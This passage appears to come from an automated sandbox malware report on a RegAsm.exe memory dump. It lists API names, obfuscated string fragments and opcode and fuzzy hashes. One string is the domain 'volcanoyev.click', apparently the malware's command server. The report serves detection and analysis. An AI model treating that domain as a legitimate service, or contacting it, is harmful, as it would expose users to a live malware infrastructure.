                                    • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                    • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: FreeLibrary$InitializeThunk
                                    • String ID: / $/,-$46
                                    • API String ID: 764372645-479303636
                                    • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                    • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                    • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                    • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
                                    • API String ID: 0-3328159043
                                    • Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                    • Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
                                    • Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                    • Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                    • API String ID: 0-2463461626
                                    • Opcode ID: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                    • Instruction ID: 1dd51b58cbaf6b0a0f55c15d87e18128fba8370b8dc8b23ccf2a832bc891c079
                                    • Opcode Fuzzy Hash: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                    • Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: &K M$&wXy$'sZu$/O_q$Jk"m$e7o9$h? !
                                    • API String ID: 0-2986092683
                                    • Opcode ID: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                    • Instruction ID: 590b8efa2b06f5e02b6b835ab0c7a13339e1eb4ce69d4453d365afcab8c45654
                                    • Opcode Fuzzy Hash: 78924bc98445a2391149b9471296c65ab5c3f104a6a24834f995a4e0cdf96e1e
                                    • Instruction Fuzzy Hash: D80286B5200B01DFD324CF25D891B97BBF1FB49705F108A2CE5AA8BAA0D775A845CF85
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                    • String ID:
                                    • API String ID: 1006321803-0
                                    • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                    • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                    • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                    • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                    • API String ID: 0-2309992716
                                    • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                    • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                    • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                    • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #4<7$+8=>$PK$Tiec$\$r
                                    • API String ID: 0-1906979145
                                    • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                    • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                    • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                    • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: )G+I$+K M$B~B$|B$s0u
                                    • API String ID: 0-2670551875
                                    • Opcode ID: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                    • Instruction ID: a4cd9e1bca78e5d66c5ba9b7c65c08060f0057a840f0996e05fe944024406416
                                    • Opcode Fuzzy Hash: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                    • Instruction Fuzzy Hash: 6C321175A08350CFD714CF28E85072EBBE2BF8A314F194A7DE89957392D7349805CB9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "$-+$/$hI
                                    • API String ID: 0-2772680581
                                    • Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                    • Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
                                    • Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                    • Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,JHj$Hs$bc$v
                                    • API String ID: 0-909542228
                                    • Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                    • Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
                                    • Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
                                    • Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,JHj$Hs$bc$v
                                    • API String ID: 0-909542228
                                    • Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                    • Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
                                    • Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
                                    • Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,JHj$Hs$bc$v
                                    • API String ID: 0-909542228
                                    • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                    • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                    • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                    • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ,JHj$Hs$bc$v
                                    • API String ID: 0-909542228
                                    • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                    • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                    • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                    • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: ,$i$r}A
                                    • API String ID: 2994545307-2114006112
                                    • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                    • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                    • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                    • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: gfff$i$r}A
                                    • API String ID: 0-3931832132
                                    • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                    • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                    • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                    • Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: <pr$st$y./
                                    • API String ID: 0-3839595785
                                    • Opcode ID: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                    • Instruction ID: 75883d3ccedddef3a45dabbf5554b36173ac4c5341f315a2b5b284ed2e941cbb
                                    • Opcode Fuzzy Hash: a785fe897820364b60474d4d38e44689b11c67a14769611824ea7061f52dc378
                                    • Instruction Fuzzy Hash: A6C16872B083206BD7149B25D95263BB3E1EFD4314F59852EE88697381E6BCD805C39A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 34$C]$|F
                                    • API String ID: 0-2804560523
                                    • Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                    • Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
                                    • Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
                                    • Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: #XXL$=$BC
                                    • API String ID: 0-2546488661
                                    • Opcode ID: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                    • Instruction ID: 9bd2012f957da0ff56630068cab070879dad6f1475f4ae026007fe123ff5be4b
                                    • Opcode Fuzzy Hash: de1a02a15010d669723b7442fb5946c988934c5b7e4ce427fae25988c8326dc7
                                    • Instruction Fuzzy Hash: 62C1EBB15083518BD324CF15C8A17ABBBE2FFD1704F0A895ED4C55B3A1EBB88845CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: 1234$oQ3$sQ3
                                    • API String ID: 2994545307-3057079318
                                    • Opcode ID: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                    • Instruction ID: 8038275947b79c29346f8cf0c7e67bd1178385f5d69ec54105c16415a8137388
                                    • Opcode Fuzzy Hash: a6f3f14e2653e663308f11d691e247aa7faefb8ce40ce58f1613db28e40f636f
                                    • Instruction Fuzzy Hash: 8DB16472A083118FC728DF28C89056BB7E2EBC9314F19853DE99697365E735ED05CB82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Ef$TQ][$sWK)
                                    • API String ID: 0-3401374238
                                    • Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                    • Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
                                    • Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
                                    • Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: +|-~$/pqr$_
                                    • API String ID: 0-1379640984
                                    • Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                    • Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
                                    • Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
                                    • Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: "51s$9YB
                                    • API String ID: 0-2722061943
                                    • Opcode ID: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                    • Instruction ID: 779a5c1bb40158b59da43047085edf677e041d4ba635d65d9609cd33f89ab022
                                    • Opcode Fuzzy Hash: 211a046e9116838b58fef2f862f3bc43e5d0a454b8724f73db8adee7e8caa559
                                    • Instruction Fuzzy Hash: EE321976B00622CBCB24CF68D8516BFB3B2FF89310B99856DD442AB364DB395D41CB54
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !@$,
                                    • API String ID: 0-2321553346
                                    • Opcode ID: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                    • Instruction ID: 02546279eb0c4d83f3c4e3be5ab3571bc15c22c1dfd1b9922496e5385efd982e
                                    • Opcode Fuzzy Hash: 00a3d0f56e47fa8dbf69d309b3c8ad0eabeffacace6d1066a3ad4a95fdf331ff
                                    • Instruction Fuzzy Hash: DB4259B1E042648FDB04CF78D8813AEBFF1AF55310F59826ED895A7391C3798846CB86
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Dx$volcanoyev.click
                                    • API String ID: 0-2198749068
                                    • Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                    • Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
                                    • Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
                                    • Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0K)$4*VP
                                    • API String ID: 0-3626284114
                                    • Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                    • Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
                                    • Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
                                    • Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: R2B$6B
                                    • API String ID: 0-20043878
                                    • Opcode ID: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                    • Instruction ID: f5db2046e1d380e536cc29ae1ea4695f6a7d49829660d0c0f3bd76f15908f1aa
                                    • Opcode Fuzzy Hash: ac58904699f18f78ac368c51fcd47e09c00d21abb36880cf37e6842ead4d4e32
                                    • Instruction Fuzzy Hash: 3AD1C276A01116CFDB18CF68DC917AE73B2FB8A311F1A85A9D841E7390DB34AD11CB58
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XG$|}
                                    • API String ID: 0-1014376750
                                    • Opcode ID: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                    • Instruction ID: fef0f9a3622c059bd3dca30c9da84c32a684abbcbc54a65241ce9b590edefb0f
                                    • Opcode Fuzzy Hash: e601669f8485cc3344b93b58b39bec23c35c7299807bf4f05dda551d1a5ff6f0
                                    • Instruction Fuzzy Hash: ECD122B16083108BD724DF18D8927ABB7F2FFE5354F49891DE5868B3A1E7788801CB56
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: )$IEND
                                    • API String ID: 0-707183367
                                    • Opcode ID: 2936136e7c09e34564bd729017d030b62aa5c2817fbff3935057bfed89b429c8
                                    • Instruction ID: dbf6d47144c6b822b2acdb98883b9d528113f132bac91ec627b85730d464e823
                                    • Opcode Fuzzy Hash: 2936136e7c09e34564bd729017d030b62aa5c2817fbff3935057bfed89b429c8
                                    • Instruction Fuzzy Hash: 34D1CEB15083449FE720CF14D84575FBBE4AB94308F14492EFA99AB3C2E779D908CB96
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: i$r}A
                                    • API String ID: 2994545307-2976846027
                                    • Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                    • Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
                                    • Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
                                    • Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: d$d
                                    • API String ID: 0-195624457
                                    • Opcode ID: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                    • Instruction ID: a6a5a8ac2d59b7de1a8b575b3a10bb681eff341670204cea3f60d1849e0cf04e
                                    • Opcode Fuzzy Hash: 5ae760aa5af7d138e0a7bd51aa20738c42f63bbe965dfb313ec005962f2f09c8
                                    • Instruction Fuzzy Hash: F1513A36908320CBC714CF24D85162BB7D2AB8A718F494A6DECC9A7351D7369D15CB8B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: P<?$P<?
                                    • API String ID: 0-3449142988
                                    • Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                    • Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
                                    • Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
                                    • Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: f
                                    • API String ID: 2994545307-1993550816
                                    • Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                    • Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
                                    • Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
                                    • Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: bC
                                    • API String ID: 0-3681614764
                                    • Opcode ID: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                    • Instruction ID: 871c5afb2dffc20ff0dbbcf53a0195aac73061a90b0e28cef4dba4d31fdaf636
                                    • Opcode Fuzzy Hash: 81246caaa5fb78c3d38635f3ad354d87a7ab4eb57a3eaf3217e543b2d80e8b50
                                    • Instruction Fuzzy Hash: 3712E23AA18215CFCB04CF28E8905AAB7B2FF8E311F1A847DD54697351D734A952CB88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: bC
                                    • API String ID: 0-3681614764
                                    • Opcode ID: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                    • Instruction ID: 5e30844967bebdc7bd1579877bde578fcf76ae60555b00215fe6639be0914efa
                                    • Opcode Fuzzy Hash: c70fff483ec8e9077dfc10fa089d78eeba6ca480428d69a1677b3b3847d620ad
                                    • Instruction Fuzzy Hash: 7DF1E436A28215CFCB04CF28E8905AAB7F2FF8E311F19847DD94697351D734A952CB88
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: bC
                                    • API String ID: 0-3681614764
